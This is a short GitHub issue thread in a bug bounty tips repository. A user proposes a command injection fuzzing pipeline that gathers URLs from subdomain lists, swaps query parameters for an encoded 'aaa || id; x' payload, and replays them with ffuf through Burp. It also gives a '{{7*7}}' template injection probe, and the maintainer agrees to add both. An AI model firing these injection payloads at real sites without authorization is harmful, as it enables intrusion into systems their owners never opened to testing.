### ISSUE TITLE
Command Injection Fuzzing

### ISSUE THREAD

**Issue by 0xJin** [KingOfBugbounty/KingOfBugBountyTips#36]
Hello, is possible add command injection for this project, here the commands: 

1) `cat subdomains.txt | httpx -silent -status-code | gauplus -random-agent -t 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt`
2) `ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080`

// search for ”uid” in burp proxy intercept 
// You can use the same query for search SSTI in qsreplase add "{{7*7}}" and search on burp for '49'

**Comment by KingOfBugbounty** [comment]
Sure bro! 

https://github.com/KingOfBugbounty/KingOfBugBountyTips/blob/master/Readme.md
